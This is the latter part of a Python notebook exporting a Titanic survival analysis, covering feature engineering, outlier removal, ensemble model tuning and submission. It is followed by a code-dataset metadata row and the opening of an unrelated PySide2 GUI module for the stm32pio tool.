# For the **test set**, the effect of `Pclass` on `Fare` is **high** (0.3331).
#
# **Conclusion:** the effect of `Pclass` on `Fare` differs by about **3%** between the two sets.
# #### Pclass vs Parch
# Let's first write a quick function to plot the proportion of `Pclass` by another discrete variable.
# In[ ]:
def plot_pclass_variable(dataset, variable):
"""
Plots the proportion of variable values per Pclass value of a dataset.
:param dataset: pandas DataFrame
:param variable: variable to plot
"""
first_variable_index = dataset.groupby(['Pclass', variable]).size()[1].index.values
second_variable_index = dataset.groupby(['Pclass', variable]).size()[2].index.values
third_variable_index = dataset.groupby(['Pclass', variable]).size()[3].index.values
index = list(set().union(first_variable_index, second_variable_index, third_variable_index))
raw_first_variable = dataset.groupby(['Pclass', variable]).size()[1]
raw_second_variable = dataset.groupby(['Pclass', variable]).size()[2]
raw_third_variable = dataset.groupby(['Pclass', variable]).size()[3]
first_variable = []
second_variable = []
third_variable = []
for i in range(max(index) + 1):
first_variable.append(raw_first_variable[i] if i in first_variable_index else 0)
second_variable.append(raw_second_variable[i] if i in second_variable_index else 0)
third_variable.append(raw_third_variable[i] if i in third_variable_index else 0)
percent_first_variable = [first_variable[i]/(first_variable[i] + second_variable[i] + third_variable[i]) if i in index else 0 for i in range(max(index) + 1)]
percent_second_variable = [second_variable[i]/(first_variable[i] + second_variable[i] + third_variable[i]) if i in index else 0 for i in range(max(index) + 1)]
percent_third_variable = [third_variable[i]/(first_variable[i] + second_variable[i] + third_variable[i]) if i in index else 0 for i in range(max(index) + 1)]
r = list(range(max(index) + 1))
fig, axs = plt.subplots(1,1,figsize=(18,4))
plt.bar(r, percent_first_variable, color='#264e86')
plt.bar(r, percent_second_variable, bottom=percent_first_variable, linewidth=0, color='#0074e4')
plt.bar(r, percent_third_variable, bottom=percent_second_variable, linewidth=0, color='#74dbef')
plt.xticks(r, r)
plt.title('Proportion of Pclass values by ' + variable)
axs.legend(labels=['1', '2', '3'])
axs.yaxis.set_major_formatter(PercentFormatter(xmax=1))
# Train set:
# In[ ]:
plot_pclass_variable(train_df, 'Parch')
chisq(train_df, 'Pclass', 'Parch')
# Test set:
# In[ ]:
plot_pclass_variable(test_df, 'Parch')
chisq(test_df, 'Pclass', 'Parch')
# We can witness very different distributions between both sets when `Parch` is equal to 3.
#
# **Conclusion**: `Pclass` and `Parch` are considered **strongly dependent** both on the train set and test set.
# #### Pclass vs SibSp
# Train set:
# In[ ]:
plot_pclass_variable(train_df, 'SibSp')
chisq(train_df, 'Pclass', 'SibSp')
# Test set:
# In[ ]:
plot_pclass_variable(test_df, 'SibSp')
chisq(test_df, 'Pclass', 'SibSp')
# **Conclusion:** contrary to `Parch` which is strongly linearly correlated to `SibSp`, `Pclass` and `SibSp` **are not** considered dependent both on the train set and test set.
# ## Step 4: Preparing the data for consumption <a id="step4"></a>
# We will proceed with **outlier elimination** and **feature engineering**.
# ### 4.1 Outlier elimination
# Outliers are usually bad for model generalization, so let's drop 1% of the samples with the **Isolation Forest** algorithm applied to `Age`, `Fare`, `Parch` and `SibSp`. For more details on the algorithm, feel free to read the original paper: https://cs.nju.edu.cn/zhouzh/zhouzh.files/publication/icdm08b.pdf.
# In[ ]:
X_train = train_df[['Age', 'Fare', 'Parch', 'SibSp']].copy(deep=True).dropna()
std_scaler = StandardScaler()
X_scaled = std_scaler.fit_transform(X_train)
clf = ensemble.IsolationForest(contamination=0.01)
clf.fit(X_scaled)
y_pred = clf.predict(X_scaled)
X_train['isOutlier'] = y_pred
outliers_list = X_train.index[X_train['isOutlier'] == -1].tolist()
data_df.drop(outliers_list, inplace=True)
train_df.drop(outliers_list, inplace=True)
TRAINING_LENGTH = len(train_df)
# #### Deleted outliers (1% ratio)
# In[ ]:
X_train[X_train['isOutlier'] == -1]
# ### 4.2. Feature engineering
# Let's now create and transform existing features to have stable distributions between both sets.
# ### Sex
# #### Mapping Sex
# The `Sex` feature can't be used as is; it has to be mapped to a boolean feature. Let's quickly map the values.
# In[ ]:
data_df['Sex'].replace(['male', 'female'], [0,1], inplace=True)
# ### Fare
# #### Guessing Fare
# We will see this below in greater detail but there is a missing value for `Fare`.
# Let's quickly fill this value with the median.
# In[ ]:
data_df['Fare'].fillna(data_df['Fare'].median(), inplace=True)
# #### Reducing Fare skewness
# In[ ]:
# Apply log to Fare to reduce skewness distribution
data_df["Fare"] = data_df["Fare"].map(lambda i: np.log(i) if i > 0 else 0)
fig, ax = plt.subplots(figsize=(16,4))
g = sns.distplot(data_df["Fare"], ax=ax, color='#25627D', label="Skewness : %.2f"%(data_df["Fare"].skew()))
g = g.legend(loc="best")
# #### Making Fare bins
# To help our model better generalize, it often helps to use bins rather than raw values. Let's make `Fare` bins.
# In[ ]:
data_df['FareBin'] = pd.qcut(data_df['Fare'], 6)
label = LabelEncoder()
data_df['FareBin_Code'] = label.fit_transform(data_df['FareBin'])
data_df.drop(['Fare'], 1, inplace=True)
data_df.drop(['FareBin'], 1, inplace=True)
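# As an illustrative check (assuming the cell above has just run), quantile binning yields roughly equal-frequency bins:

# In[ ]:


print(data_df['FareBin_Code'].value_counts().sort_index())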
# Let's see if we reduced the divergence between both sets.
# In[ ]:
train_df = data_df[:TRAINING_LENGTH]
test_df = data_df[TRAINING_LENGTH:]
logfare_jsd = JSD(train_df['FareBin_Code'].dropna().values, test_df['FareBin_Code'].dropna().values)
print('Jensen-Shannon divergence of Fare:', np.mean(logfare_jsd))
print('Standard deviation:', np.std(logfare_jsd))
# In[ ]:
fig, ax = plt.subplots(figsize=(16,4))
jsd = pd.DataFrame(np.column_stack([fare_jsd, logfare_jsd]), columns=['Fare', 'LogFare'])
sns.boxplot(data=jsd, ax=ax, orient="h", linewidth=1, saturation=5, palette=palette2)
ax.set_title('Jensen-Shannon divergences of Fare and LogFare')
# Great, we **reduced the divergence** between the train set and the test set a bit, making it a more consistent feature.
# ### Ticket
# #### Extracting the prefix
# Ticket numbers may have a prefix that could be an indicator of the booking process (tied to wealth) and/or the location on the boat. Let's extract it.
# In[ ]:
Ticket = []
for i in data_df['Ticket'].values:
if not i.isdigit() :
        Ticket.append(i.replace('.', '').replace('/', '').strip().split()[0])
else:
Ticket.append('X')
data_df['Ticket'] = Ticket
# #### Getting Ticket dummy variables
# In[ ]:
data_df = pd.get_dummies(data_df, columns=['Ticket'], drop_first=True)
# ### Title
# #### Creating Title
# A feature that often helps with categorization in this problem is `Title`, derived from `Name`.
# In[ ]:
# Get Title from Name
titles = [i.split(',')[1].split('.')[0].strip() for i in data_df['Name']]
data_df['Title'] = pd.Series(titles, index=data_df.index)
rare_titles = pd.Series(titles).value_counts()
rare_titles = rare_titles[rare_titles < 10].index
data_df['Title'] = data_df['Title'].replace(rare_titles, 'Rare')
data_df['Title'] = data_df['Title'].map({'Mr': 0, 'Miss': 1, 'Mrs': 2, 'Master': 3, 'Rare': 4})
data_df['Title'] = data_df['Title'].astype(int)
# #### Getting Title dummy variables
# Great, the feature shows some discrimination. It is not ordinal though, so let's create dummy variables out of it (we only need `k-1` columns).
# In[ ]:
data_df = pd.get_dummies(data_df, columns=['Title'], drop_first=True)
# ### Family_Size
# #### Creating Family_Size
# Finally we are combining `Parch` and `SibSp`: `Family_Size = Parch + SibSp + 1`.
# In[ ]:
data_df['Family_Size'] = data_df['Parch'] + data_df['SibSp'] + 1
# In[ ]:
tmp_train_df = data_df[:TRAINING_LENGTH].copy(deep=True)
tmp_test_df = data_df[TRAINING_LENGTH:].copy(deep=True)
fs_jsd = JSD(tmp_train_df['Family_Size'].dropna().values, tmp_test_df['Family_Size'].dropna().values)
print('Jensen-Shannon divergence of Family_Size:', np.mean(fs_jsd))
print('Standard deviation:', np.std(fs_jsd))
# In[ ]:
fig, ax = plt.subplots(figsize=(16,4))
jsd = pd.DataFrame(np.column_stack([parch_jsd, sibsp_jsd, fs_jsd]), columns=['Parch', 'SibSp', 'Family_Size'])
sns.boxplot(data=jsd, ax=ax, orient="h", linewidth=1, saturation=5, palette=palette3)
ax.set_title('Jensen-Shannon divergences of Parch, SibSp and Family_Size')
# Great, we **reduced the divergence** between the train set and the test set a bit, making it a more consistent feature. We didn't lose much information as we are adding two linearly correlated features.
# ### Missing values
# Let's first have a quick look at missing values in the datasets:
# In[ ]:
print('Train dataset:')
train_df.isnull().sum().to_frame('Missing values').transpose()
# In[ ]:
print('Test/Validation dataset:')
test_df.isnull().sum().to_frame('Missing values').transpose()
# #### Dropping Name, Parch, SibSp
# Let's drop those features:
# * `Name`: was used to create the `Title` feature
# * `Parch`: was used to create the `Family_Size` feature
# * `SibSp`: was used to create the `Family_Size` feature
# In[ ]:
data_df.drop(['Name', 'Parch', 'SibSp'], axis = 1, inplace = True)
# ### Embarked
# #### Filling Embarked
# For 2 missing values, let's fill `Embarked` with the most frequent value.
# In[ ]:
data_df['Embarked'].fillna(data_df['Embarked'].mode()[0], inplace=True)
# #### Getting Embarked dummy variables
# In[ ]:
data_df = pd.get_dummies(data_df, columns=['Embarked'], drop_first=True)
# ### Deck
# #### Creating Deck
# There are a lot of missing values for the `Cabin` feature. This can be explained by the fact that some passengers didn't have a cabin at all. Let's fill `NaN` values with `X` and extract the deck (letter), as it could indicate the location of the passenger's cabin on the boat.
# In[ ]:
# Keep data_df's PassengerId index so the new Series aligns correctly
data_df['Cabin'] = pd.Series([i[0] if not pd.isnull(i) else 'X' for i in data_df['Cabin']], index=data_df.index)
# In[ ]:
palette9 = ["#F8C7AA", "#F19B9C", "#EA708E", "#D54D88", "#A73B8F", "#7A2995", "#5B1F84", "#451764", "#300F45"]
g = sns.catplot(x='Cabin', y='Survived',saturation=5, aspect=2.5, data=data_df, kind='bar', order=['A','B','C','D','E','F','G','T','X'], palette=palette9)
# #### Getting Deck dummy variables
# In[ ]:
data_df = pd.get_dummies(data_df, columns=['Cabin'], prefix='Deck', drop_first=True)
# ### Age
# #### Guessing the Age
# The `Age` feature has quite a lot of missing values, but it is still manageable. It can easily be completed with the median value (remember, not the mean), although we would rather predict those values with a **MICE imputer** so that they better fit the distributions of the other features.
#
# **Side note:** the MICE imputer was removed from `sklearn 0.20`, so we fall back to a simple median imputation below.
# In[ ]:
tmp_data_df = data_df.copy(deep = True)[['Age']]
imp = SimpleImputer(missing_values=np.nan, strategy='median')
tmp_data_df = pd.DataFrame(data=imp.fit_transform(tmp_data_df),index=tmp_data_df.index.values,columns=tmp_data_df.columns.values)
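# For reference, newer scikit-learn versions (>= 0.21) reintroduce a MICE-style imputer as the experimental `IterativeImputer`; a minimal sketch, left commented out since it assumes such a version is installed:

# In[ ]:


# from sklearn.experimental import enable_iterative_imputer  # noqa: F401, required before the next import
# from sklearn.impute import IterativeImputer
# mice = IterativeImputer(max_iter=10, random_state=0)
# data_df['Age'] = mice.fit_transform(data_df[['Age', 'Pclass', 'Sex', 'Family_Size']])[:, 0]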
# #### Making Age bins
# In[ ]:
tmp_data_df['AgeBin'] = pd.qcut(tmp_data_df['Age'], 5, duplicates='drop')
tmp_data_df['AgeBin'].replace(np.NaN, -1, inplace = True)
label = LabelEncoder()
tmp_data_df['AgeBin_Code'] = label.fit_transform(tmp_data_df['AgeBin'])
tmp_data_df.drop(['Age', 'AgeBin'], axis=1, inplace=True)
data_df['AgeBin_Code'] = tmp_data_df['AgeBin_Code']
data_df.drop(['Age'], 1, inplace=True)
# Let's then compare the 3 most important features.
# In[ ]:
# Histogram comparison of Sex, Pclass, and Age by Survival
h = sns.FacetGrid(data_df, row='Sex', col='Pclass', hue='Survived')
h.map(plt.hist, 'AgeBin_Code', alpha=.75)
h.add_legend()
# ### A glance at our dataset
# In[ ]:
train_df = data_df[:TRAINING_LENGTH]
train_df.Survived = train_df.Survived.astype(int)
test_df = data_df[TRAINING_LENGTH:]
# In[ ]:
train_df.sample(5)
# ### 4.3. Data formatting
#
# Let's create our `X` and `y` and scale them.
# In[ ]:
X = train_df.drop('Survived', 1)
y = train_df['Survived']
X_test = test_df.copy().drop(columns=['Survived'], axis=1)
# In[ ]:
std_scaler = StandardScaler()
X = std_scaler.fit_transform(X)
X_test = std_scaler.transform(X_test)
# ## Step 5: Modeling the data <a id="step5"></a>
# ### 5.1. Model performance with Cross-Validation (CV)
# Let's quickly compare several classification algorithms with default parameters from `scikit-learn`, `xgboost`, `lightgbm` and `catboost` through cross-validation.
# In[ ]:
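# Thin wrapper so CatBoost round-trips labels through a LabelEncoder in fit/predict,
# making it behave like a standard scikit-learn classifier inside cross_validate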
class CatBoostClassifierCorrected(CatBoostClassifier):
def fit(self, X, y=None, cat_features=None, sample_weight=None, baseline=None, use_best_model=None,
eval_set=None, verbose=None, logging_level=None, plot=False, column_description=None, verbose_eval=None,
metric_period=None, silent=None, early_stopping_rounds=None, save_snapshot=None, snapshot_file=None, snapshot_interval=None):
# Handle different types of label
self.le_ = LabelEncoder().fit(y)
transformed_y = self.le_.transform(y)
self._fit(X=X, y=transformed_y, cat_features=cat_features, pairs=None, sample_weight=sample_weight, group_id=None,
group_weight=None, subgroup_id=None, pairs_weight=None, baseline=baseline, use_best_model=use_best_model,
eval_set=eval_set, verbose=verbose, logging_level=logging_level, plot=plot, column_description=column_description,
verbose_eval=verbose_eval, metric_period=metric_period, silent=silent, early_stopping_rounds=early_stopping_rounds,
save_snapshot=save_snapshot, snapshot_file=snapshot_file, snapshot_interval=None)
return self
def predict(self, data, prediction_type='Class', ntree_start=0, ntree_end=0, thread_count=1, verbose=None):
predictions = self._predict(data, prediction_type, ntree_start, ntree_end, thread_count, verbose)
# Return same type as input
return self.le_.inverse_transform(predictions.astype(np.int64))
# In[ ]:
# Machine Learning Algorithm (MLA) Selection and Initialization
MLA = [
# Ensemble Methods
ensemble.RandomForestClassifier(),
# Nearest Neighbors
neighbors.KNeighborsClassifier(),
# XGBoost
XGBClassifier(),
# LightGBM
lgb.LGBMClassifier(),
# CatBoost
CatBoostClassifierCorrected(iterations=100, logging_level='Silent')
]
# Split dataset in cross-validation with this splitter class
cv_split = model_selection.ShuffleSplit(n_splits = 10, test_size = .3, train_size = .6, random_state = 0)
# Create table to compare MLA metrics
MLA_columns = ['MLA Name', 'MLA Parameters','MLA Train Accuracy Mean', 'MLA Test Accuracy Mean', 'MLA Test Accuracy 3*STD' ,'MLA Time']
MLA_compare = pd.DataFrame(columns = MLA_columns)
# Create table to compare MLA predictions
MLA_predict = pd.Series()
# Index through MLA and save performance to table
row_index = 0
for alg in MLA:
# Set name and parameters
MLA_name = alg.__class__.__name__
MLA_compare.loc[row_index, 'MLA Name'] = MLA_name
MLA_compare.loc[row_index, 'MLA Parameters'] = str(alg.get_params())
# Score model with cross validation
cv_results = model_selection.cross_validate(alg, X, y, cv = cv_split)
MLA_compare.loc[row_index, 'MLA Time'] = cv_results['fit_time'].mean()
MLA_compare.loc[row_index, 'MLA Train Accuracy Mean'] = cv_results['train_score'].mean()
MLA_compare.loc[row_index, 'MLA Test Accuracy Mean'] = cv_results['test_score'].mean()
    # If this is an unbiased random sample, then +/-3 standard deviations (std) from the mean should statistically capture 99.7% of the subsets
MLA_compare.loc[row_index, 'MLA Test Accuracy 3*STD'] = cv_results['test_score'].std()*3 #let's know the worst that can happen!
# Save MLA predictions - see section 6 for usage
alg.fit(X, y)
MLA_predict[MLA_name] = alg.predict(X)
row_index+=1
# Print and sort table
MLA_compare.sort_values(by = ['MLA Test Accuracy Mean'], ascending = False, inplace = True)
MLA_compare
# In[ ]:
fig, ax = plt.subplots(figsize=(16,6))
# Barplot
sns.barplot(x='MLA Test Accuracy Mean', y='MLA Name', ax=ax, data=MLA_compare, palette=sns.color_palette("coolwarm_r", 5))
# Prettify
plt.title('Machine Learning Algorithm Accuracy Score')
plt.xlabel('Accuracy Score (%)')
plt.ylabel('Algorithm')
# As we can see, the top models are pretty similar in terms of **accuracy**.
# ### 5.2. Tune the model with ensemble methods
#
# Let's try to leverage ensemble methods to maximize accuracy on the test set.
#
# Let's try two ensemble methods:
# * **hard voting**: classification is the most frequent answer
# * **soft voting**: classification is based on the argmax of the sums of the predicted probabilities
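# To make the contrast concrete, a toy example with made-up probabilities (three models, one sample) where the two schemes disagree:
# In[ ]:
probas = np.array([[0.90, 0.10],   # model 1: confidently predicts class 0
                   [0.45, 0.55],   # model 2: narrowly predicts class 1
                   [0.45, 0.55]])  # model 3: narrowly predicts class 1
print('hard vote:', np.bincount(probas.argmax(axis=1)).argmax())  # majority of predicted labels -> 1
print('soft vote:', probas.mean(axis=0).argmax())                 # argmax of averaged probabilities -> 0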
# In[ ]:
# Removed models w/o attribute 'predict_proba' required for vote classifier and models with a 1.0 correlation to another model
vote_est = [
# Ensemble Methods:
('rfc', ensemble.RandomForestClassifier()),
# Nearest Neighbors:
('knn', neighbors.KNeighborsClassifier()),
# XGBoost:
('xgb', XGBClassifier()),
# LightGBM:
('lgb', lgb.LGBMClassifier()),
# CatBoost:
('cat', CatBoostClassifierCorrected(iterations=100, logging_level='Silent'))
]
# Hard vote or majority rules
vote_hard = ensemble.VotingClassifier(estimators = vote_est, voting = 'hard')
vote_hard_cv = model_selection.cross_validate(vote_hard, X, y, cv = cv_split)
vote_hard.fit(X, y)
print("Hard Voting Training w/bin score mean: {:.2f}". format(vote_hard_cv['train_score'].mean()*100))
print("Hard Voting Test w/bin score mean: {:.2f}". format(vote_hard_cv['test_score'].mean()*100))
print("Hard Voting Test w/bin score 3*std: +/- {:.2f}". format(vote_hard_cv['test_score'].std()*100*3))
print('-'*15)
# Soft vote or weighted probabilities
vote_soft = ensemble.VotingClassifier(estimators = vote_est , voting = 'soft')
vote_soft_cv = model_selection.cross_validate(vote_soft, X, y, cv = cv_split)
vote_soft.fit(X, y)
print("Soft Voting Training w/bin score mean: {:.2f}". format(vote_soft_cv['train_score'].mean()*100))
print("Soft Voting Test w/bin score mean: {:.2f}". format(vote_soft_cv['test_score'].mean()*100))
print("Soft Voting Test w/bin score 3*std: +/- {:.2f}". format(vote_soft_cv['test_score'].std()*100*3))
print('-'*15)
# Good results, but there is room for improvement: we haven't touched any of the hyperparameters of the voting models yet.
#
# Let's perform a grid search on the different classifiers. **(careful, the full grids take A LOT of time)**
#
# (Only the best values found are left active below; the commented-out lists show the full grids that were searched.)
# In[ ]:
# Hyper-parameter tuning with GridSearchCV:
grid_param = [
[{
# RandomForestClassifier
'criterion': ['gini'], #['gini', 'entropy'],
'max_depth': [8], #[2, 4, 6, 8, 10, None],
'n_estimators': [100], #[10, 50, 100, 300],
'oob_score': [False] #[True, False]
}],
[{
# KNeighborsClassifier
'algorithm': ['auto'], #['auto', 'ball_tree', 'kd_tree', 'brute'],
'n_neighbors': [7], #[1,2,3,4,5,6,7],
'weights': ['distance'] #['uniform', 'distance']
}],
[{
# XGBClassifier
'learning_rate': [0.05], #[0.05, 0.1,0.16],
'max_depth': [10], #[10,30,50],
'min_child_weight' : [6], #[1,3,6]
'n_estimators': [200]
}],
[{
# LightGBMClassifier
'learning_rate': [0.01], #[0.01,0.05,0.1],
'n_estimators': [200],
'num_leaves': [300], #[300,900,1200],
'max_depth': [25], #[25,50,75],
}],
[{
# CatBoostClassifier
'depth': [4],
'learning_rate' : [0.03],
'l2_leaf_reg': [4],
'iterations': [300],
'thread_count': [4]
}]
]
start_total = time.perf_counter()
for clf, param in zip (vote_est, grid_param):
start = time.perf_counter()
best_search = model_selection.GridSearchCV(estimator = clf[1], param_grid = param, cv = cv_split, scoring = 'roc_auc')
best_search.fit(X, y)
run = time.perf_counter() - start
best_param = best_search.best_params_
print('The best parameter for {} is {} with a runtime of {:.2f} seconds.'.format(clf[1].__class__.__name__, best_param, run))
clf[1].set_params(**best_param)
run_total = time.perf_counter() - start_total
print('Total optimization time was {:.2f} minutes.'.format(run_total/60))
print('-'*15)
# In[ ]:
# Hard vote or majority rules w/Tuned Hyperparameters
grid_hard = ensemble.VotingClassifier(estimators = vote_est , voting = 'hard')
grid_hard_cv = model_selection.cross_validate(grid_hard, X, y, cv = cv_split)
grid_hard.fit(X, y)
print("Hard Voting w/Tuned Hyperparameters Training w/bin score mean: {:.2f}". format(grid_hard_cv['train_score'].mean()*100))
print("Hard Voting w/Tuned Hyperparameters Test w/bin score mean: {:.2f}". format(grid_hard_cv['test_score'].mean()*100))
print("Hard Voting w/Tuned Hyperparameters Test w/bin score 3*std: +/- {:.2f}". format(grid_hard_cv['test_score'].std()*100*3))
print('-'*15)
# Soft vote or weighted probabilities w/Tuned Hyperparameters
grid_soft = ensemble.VotingClassifier(estimators = vote_est , voting = 'soft')
grid_soft_cv = model_selection.cross_validate(grid_soft, X, y, cv = cv_split)
grid_soft.fit(X, y)
print("Soft Voting w/Tuned Hyperparameters Training w/bin score mean: {:.2f}". format(grid_soft_cv['train_score'].mean()*100))
print("Soft Voting w/Tuned Hyperparameters Test w/bin score mean: {:.2f}". format(grid_soft_cv['test_score'].mean()*100))
print("Soft Voting w/Tuned Hyperparameters Test w/bin score 3*std: +/- {:.2f}". format(grid_soft_cv['test_score'].std()*100*3))
print('-'*15)
# ### 5.3. Submission
# Good scores overall, let's prepare the data for submission.
# In[ ]:
test_df['Survived'] = grid_soft.predict(X_test)
test_df['Survived'] = test_df['Survived'].astype(int)
print('Validation Data Distribution: \n', test_df['Survived'].value_counts(normalize = True))
submit = test_df[['Survived']]
#submit.to_csv("../output/submission.csv", index=True)
# Wait a minute, **0.79904** accuracy after submission? (still top 14% though)
# ## Step 6: Drawing conclusions <a id="step6"></a>
# It appears that our models capture some distributions from the engineered training dataset that differ slightly in the testing dataset: this is a sign of **overfitting**.
#
# We did use a lot of features from our datasets and generally, if you want to avoid overfitting, **less is better**. Remember the mapping of $X$ to a different feature space? We discovered through EDA that **the train set and the test set are not equally distributed**. We need a mapping that simplifies the distributions of features that have an influence on survival. And that's why this problem is hard.
#
# ### 6.1. Simplifying our datasets
#
# #### Dropping Deck, Embarked and Ticket
# Let's drop the most ambiguous features.
# In[ ]:
columns = [c for c in data_df.columns if 'Deck' in c or 'Embarked' in c or 'Ticket' in c]
simple_data_df = data_df.copy(deep=True)
simple_data_df.drop(columns=columns, axis=1, inplace=True)
# #### Simplifying Age
# Let's create the `Young` boolean feature telling us whether the passenger is young (below the 2nd age bin).
# In[ ]:
simple_data_df['Young'] = np.where((simple_data_df['AgeBin_Code']<2), 1, 0)
simple_data_df.drop(columns=['AgeBin_Code'], axis=1, inplace=True)
# #### Merging Pclass and Sex
# Let's merge `Pclass` and `Sex`.
# In[ ]:
simple_data_df['P1_Male'] = np.where((simple_data_df['Sex']==0) & (simple_data_df['Pclass']==1), 1, 0)
simple_data_df['P2_Male'] = np.where((simple_data_df['Sex']==0) & (simple_data_df['Pclass']==2), 1, 0)
simple_data_df['P3_Male'] = np.where((simple_data_df['Sex']==0) & (simple_data_df['Pclass']==3), 1, 0)
simple_data_df['P1_Female'] = np.where((simple_data_df['Sex']==1) & (simple_data_df['Pclass']==1), 1, 0)
simple_data_df['P2_Female'] = np.where((simple_data_df['Sex']==1) & (simple_data_df['Pclass']==2), 1, 0)
simple_data_df['P3_Female'] = np.where((simple_data_df['Sex']==1) & (simple_data_df['Pclass']==3), 1, 0)
simple_data_df.drop(columns=['Pclass', 'Sex'], axis=1, inplace=True)
# In[ ]:
simple_train_df = simple_data_df[:TRAINING_LENGTH]
simple_test_df = simple_data_df[TRAINING_LENGTH:]
simple_data_df.sample(5)
# ### 6.2. Data formatting
# Let's create our `X` and `y` and scale them.
# In[ ]:
X = simple_train_df.drop('Survived', 1)
y = simple_train_df['Survived']
X_test = simple_test_df.copy().drop(columns=['Survived'], axis=1)
std_scaler = StandardScaler()
X = std_scaler.fit_transform(X)
X_test = std_scaler.transform(X_test)
# ### 6.3. Hyper-parameter tuning and ensemble methods
# Let's try to leverage ensemble methods to maximize accuracy on the test set.
# In[ ]:
# Hyper-parameter tuning with GridSearchCV:
grid_param = [
[{
# RandomForestClassifier
'criterion': ['gini'], #['gini', 'entropy'],
'max_depth': [8], #[2, 4, 6, 8, 10, None],
'n_estimators': [100], #[10, 50, 100, 300],
'oob_score': [False] #[True, False]
}],
[{
# KNeighborsClassifier
'algorithm': ['auto'], #['auto', 'ball_tree', 'kd_tree', 'brute'],
'n_neighbors': [7], #[1,2,3,4,5,6,7],
'weights': ['distance'] #['uniform', 'distance']
}],
[{
# XGBClassifier
'learning_rate': [0.05], #[0.05, 0.1,0.16],
'max_depth': [10], #[10,30,50],
'min_child_weight' : [6], #[1,3,6]
'n_estimators': [200]
}],
[{
# LightGBMClassifier
'learning_rate': [0.01], #[0.01,0.05,0.1],
'n_estimators': [200],
'num_leaves': [300], #[300,900,1200],
'max_depth': [25], #[25,50,75],
}],
[{
# CatBoostClassifier
'depth': [4],
'learning_rate' : [0.03],
'l2_leaf_reg': [4],
'iterations': [300],
'thread_count': [4]
}]
]
start_total = time.perf_counter()
for clf, param in zip (vote_est, grid_param):
start = time.perf_counter()
best_search = model_selection.GridSearchCV(estimator = clf[1], param_grid = param, cv = cv_split, scoring = 'roc_auc')
best_search.fit(X, y)
run = time.perf_counter() - start
best_param = best_search.best_params_
print('The best parameter for {} is {} with a runtime of {:.2f} seconds.'.format(clf[1].__class__.__name__, best_param, run))
clf[1].set_params(**best_param)
run_total = time.perf_counter() - start_total
print('Total optimization time was {:.2f} minutes.'.format(run_total/60))
print('-'*15)
# In[ ]:
# Hard vote or majority rules w/Tuned Hyperparameters
grid_hard = ensemble.VotingClassifier(estimators = vote_est , voting = 'hard')
grid_hard_cv = model_selection.cross_validate(grid_hard, X, y, cv = cv_split)
grid_hard.fit(X, y)
print("Hard Voting w/Tuned Hyperparameters Training w/bin score mean: {:.2f}". format(grid_hard_cv['train_score'].mean()*100))
print("Hard Voting w/Tuned Hyperparameters Test w/bin score mean: {:.2f}". format(grid_hard_cv['test_score'].mean()*100))
print("Hard Voting w/Tuned Hyperparameters Test w/bin score 3*std: +/- {:.2f}". format(grid_hard_cv['test_score'].std()*100*3))
print('-'*15)
# Soft vote or weighted probabilities w/Tuned Hyperparameters
grid_soft = ensemble.VotingClassifier(estimators = vote_est , voting = 'soft')
grid_soft_cv = model_selection.cross_validate(grid_soft, X, y, cv = cv_split)
grid_soft.fit(X, y)
print("Soft Voting w/Tuned Hyperparameters Training w/bin score mean: {:.2f}". format(grid_soft_cv['train_score'].mean()*100))
print("Soft Voting w/Tuned Hyperparameters Test w/bin score mean: {:.2f}". format(grid_soft_cv['test_score'].mean()*100))
print("Soft Voting w/Tuned Hyperparameters Test w/bin score 3*std: +/- {:.2f}". format(grid_soft_cv['test_score'].std()*100*3))
print('-'*15)
# ### 6.4. Submission
# Ok, let's prepare the data for submission.
# In[ ]:
simple_test_df['Survived'] = grid_soft.predict(X_test)
simple_test_df['Survived'] = simple_test_df['Survived'].astype(int)
print('Validation Data Distribution: \n', simple_test_df['Survived'].value_counts(normalize = True))
submit = simple_test_df[['Survived']]
#submit.to_csv("../output/submission.csv", index=True)
# ## Changelog
# v1: initial submission.
# *This is a work in progress. Comments and critical feedback are always welcome.*
| [
"[email protected]"
] | |
7a9afdf64f2cd4a6b567ec1cf52e36b3070f9b44 | 22be59b7203b4efbfdfce10b08be232f45864973 | /stm32pio/gui/app.py | 02383b2a6b40b3ba927e17d8cf539c832ac61255 | [] | no_license | OS-Q/S48 | 1507d5ad40e27ced354f617eb389a3005e9f3c91 | 8819cf772e7f090c407f48789793952d59a13a16 | refs/heads/master | 2023-02-03T16:43:14.181130 | 2020-12-25T12:32:03 | 2020-12-25T12:32:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 37,637 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import collections
import inspect
import logging
import pathlib
import platform
import sys
import threading
import time
import weakref
from typing import List, Callable, Optional, Any, Mapping, MutableMapping, Iterator, Union
try:
from PySide2.QtCore import QUrl, Property, QAbstractListModel, QModelIndex, QObject, Qt, Slot, Signal, QThread,\
qInstallMessageHandler, QtInfoMsg, QtWarningMsg, QtCriticalMsg, QtFatalMsg, QThreadPool, QRunnable,\
QStringListModel, QSettings
if platform.system() == 'Linux':
# Most UNIX systems does not provide QtDialogs implementation so the program should be 'linked' against
# the QApplication...
from PySide2.QtWidgets import QApplication
QApplicationClass = QApplication
else:
from PySide2.QtGui import QGuiApplication
QApplicationClass = QGuiApplication
from PySide2.QtGui import QIcon
from PySide2.QtQml import qmlRegisterType, QQmlApplicationEngine, QJSValue
except ImportError as e:
print(e)
print("\nGUI version requires PySide2 to be installed. You can re-install stm32pio as 'pip install stm32pio[GUI]' "
"or manually install its dependencies by yourself")
sys.exit(-1)
MODULE_PATH = pathlib.Path(__file__).parent # module path, e.g. stm32pio-repo/stm32pio_gui/
ROOT_PATH = MODULE_PATH.parent.parent # repo's or the site-package's entry root
try:
import stm32pio.core.settings
import stm32pio.core.lib
import stm32pio.core.util
import stm32pio.cli.app
except ModuleNotFoundError:
sys.path.insert(0, str(ROOT_PATH))
import stm32pio.core.settings
import stm32pio.core.lib
import stm32pio.core.util
import stm32pio.cli.app
ProjectID = type(id(object))  # effectively just 'int', but keeps the intent explicit
class BuffersDispatchingHandler(logging.Handler):
"""
Every user's project using its own buffer (collections.deque) to store logs. This simple logging.Handler subclass
finds and puts an incoming record into the corresponding buffer
"""
buffers: MutableMapping[ProjectID, collections.deque] = {} # the dictionary of projects' ids and theirs buffers
def emit(self, record: logging.LogRecord) -> None:
if hasattr(record, 'project_id'):
# As we exist in the asynchronous environment there is always a risk of some "desynchronization" when the
# project (and its buffer) has already been gone but some late message has arrived. Hence, we need to check
buffer = self.buffers.get(record.project_id)
if buffer is not None:
buffer.append(record)
else:
module_logger.warning(f"Logging buffer for the project id {record.project_id} not found. The message "
f"was:\n{record.msg}")
else:
module_logger.warning("LogRecord doesn't have a project_id attribute. Perhaps this is a result of the "
